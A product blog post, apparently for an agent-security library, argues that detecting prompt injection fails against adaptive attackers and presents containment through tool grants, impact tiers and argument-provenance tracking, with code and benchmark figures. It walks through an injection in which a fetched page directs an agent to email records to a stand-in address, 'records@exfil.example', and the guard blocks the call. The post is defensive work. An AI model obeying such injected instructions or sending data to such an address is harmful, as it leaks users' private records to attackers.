Why prompt injection detection loses
Prompt injection works because a language model cannot reliably tell instructions it should follow from text it should only read. A retrieved web page, a support ticket or a tool result can all carry the sentence that changes what the agent does next. The natural response is to detect that sentence: a classifier, a regex list, a second model that judges the first.
Detection is worth having. It is also a contest the defender loses slowly. The attacker gets to see the refusal and try again. Researchers testing twelve published defences against adaptive attacks reported success rates above 90% once the attacker could iterate (Nasr, Carlini, Schulhoff et al., The Attacker Moves Second, 2025). We ran the same kind of test against our own detector. An attacker who adapts gets 71% of the attacks we catch through within 50 attempts. And with the default install's heuristic alone, held-out injection recall is 26.7% at 100% precision on the deepset split. That is a speed bump, not a wall.
If your agent can send email, move money or delete files, the question is not whether an injection gets past the detector. It is what happens when it does.
Ask a different question
Detection asks: does this text look like an attack? That question has no stable answer. Containment asks three questions that do:
- Is this agent allowed to call this tool, with these arguments? Written down before the agent runs. A prompt cannot add to it.
- How bad is this tool if it is misused? Read, write, high impact or irreversible.
- Where did these argument values come from? The user, your own code, or a document the agent just read.
None of them depends on recognising the payload. An email to an attacker's address is refused because the address arrived in untrusted content and the tool is irreversible, not because anything read the instruction and found it suspicious.
Three checks on every tool call
1. Capability grants: default deny
Each agent holds explicit capability grants: which tools it may call, with limits on the arguments (amount below 1000, to matching your own domain), how tainted the inputs may be, whether a person must approve, and when the grant expires. Anything not granted is refused. That is not a policy setting you can forget to turn on; a call with no grant is refused whatever mode the policy pack is in.

capability.denied. No detector was involved.2. Impact tiers
Each tool is declared read, write, high_impact or irreversible. A tool seen in traffic before anyone declared it gets an inferred tier from its name (send, delete, transfer and deploy read as irreversible), and an operator confirms or corrects it. The tier is what decides how much scrutiny a call gets.
3. Argument provenance
Every argument carries where it came from: none (a constant in your code), user, retrieved, tool_result, subagent or memory, in rising order of risk. An irreversible tool called with an argument that originated in untrusted content is escalated to a person. A lower-impact tool's output flowing into a higher-impact tool is blocked as composition.escalation. This is the check that handles the lethal trifecta, Simon Willison's name for an agent that has private data, reads untrusted content and can send data out. Our repository scan flags any agent that holds all three.
What it looks like in code
Declare the tool and grant it once, from the command line or in review:
agentfox declare tool email.send --impact irreversible
agentfox permit grant support-triage email.send --limit 'to:matches=@example\.com$' --yesThen guard the calls in a session, telling it what the agent read along the way. This is adapted from the contain tool calls guide:
from agentfox import AgentFox, PolicyViolation
fox = AgentFox(agent="support-triage", environment="development")
with fox.session(intent="Triage a support ticket and reply to the customer.") as s:
s.guard_tool("web.fetch", {"url": url})
page = s.tool_result(web_fetch(url), tool="web.fetch") # untrusted from here on
# The page told the model to mail the records somewhere else.
args = {"to": "records@exfil.example", "subject": "Your ticket", "body": "..."}
try:
s.guard_tool("email.send", args)
except PolicyViolation as exc:
print([r["rule_id"] for r in exc.result.rules_fired])['taint.irreversible_tool', 'capability.constraint_violated', 'composition.escalation']Three independent reasons stop the call, and none of them needed to recognise the instruction in the page. If you would rather not touch call sites, agentfox.auto() patches the supported model SDKs and infers provenance by matching values. One warning: @fox.tool defaults to impact="read", so a destructive tool you forget to declare is treated as a read.
What we measured
A claim like this is only worth something if you can check it, so the containment benchmark runs with every detector switched off. Eight constructed scenarios, one per containment mechanism, with a compromised agent as the premise: 8/8 attacks contained with zero detector signal, and 4/4 legitimate calls still allowed.
The second test is larger and less flattering. We replayed AgentDojo (v1.2.2, 97 user tasks) through the enforcement path with provenance inferred from the tool outputs that actually ran and detectors off. On AgentDojo, session-level taint contained 588 of 588 attack pairs. For comparison, grants and impact tiers on their own contain 61 of 702 attacker write calls: the grant check is the floor, and provenance does most of the work. Of the detector bypasses an adaptive attacker found, 38/38 of those bypasses still contained at the action.

The cost, honestly
Containment is not free, and the cost is real work getting stopped. With session-level taint, only 24 of 97 benign tasks ran without escalating to a human: once an agent has read anything untrusted, every irreversible call after it goes to a person. Per-argument taint lets far more work through but misses short values and values embedded inside a larger argument. Exempting read-only tools helps further, and we designed that exemption after seeing the results, which the benchmark page says.
Three other limits are worth stating plainly:
- It is only as good as your declarations. Declare a destructive tool as
readand the check believes you. - An escalation is not a block. The replay counts escalation as containment. A person who approves the escalated call lets the attack through, which is why approvals show the provenance.
- A shell is one tool. For a coding agent,
lsandrmare the same tool, so the argument parsing has to do the work. That is the subject of the hooks post.
Where to start
- Scan the repository to find agents that hold the lethal trifecta:
agentfox scan. - Declare an impact tier for every tool that writes, and every tool that cannot be undone.
- Grant per agent, with argument limits, and let default deny refuse the rest.
- Turn on provenance and run in observe mode first. Read what would have been escalated.
- Keep detection on. It is a speed bump, and speed bumps are useful.
Detection-side techniques are covered in three injections a keyword filter misses.
Frequently asked questions
Can prompt injection be fully prevented?
Not by detection alone. Published work on adaptive attacks reports high success rates against every defence it tested once the attacker can iterate, and our own detector is no exception. What can be prevented is the damaging action: a tool call the agent was never granted, or an irreversible call whose arguments came from untrusted content.
What is the lethal trifecta?
Simon Willison's term for an agent that has access to private data, is exposed to content an outsider can write, and has a way to send data out. Any two are manageable. All three in one agent means a single injected instruction can exfiltrate data. AgentFox's repository scan reports it as a critical finding.
What is argument provenance or taint tracking for AI agents?
Recording where each tool-call argument came from: your own code, the user, a retrieved document, another tool's output, a sub-agent or memory. A policy can then refuse or escalate an irreversible call whose arguments came from untrusted content, whatever those arguments say.
Does containment replace prompt injection detection?
No. Detection still raises the attacker's cost and catches the obvious cases early. Containment is what still holds when detection misses, which is why we measure it with every detector switched off.
What is the downside of taint-based containment?
It escalates legitimate work. In our AgentDojo replay, session-level taint contained every attack pair but let only about a quarter of benign tasks run without a human. Per-argument taint and read-only exemptions improve that, at the cost of missing some attacks. The trade-off is published on the benchmark page.


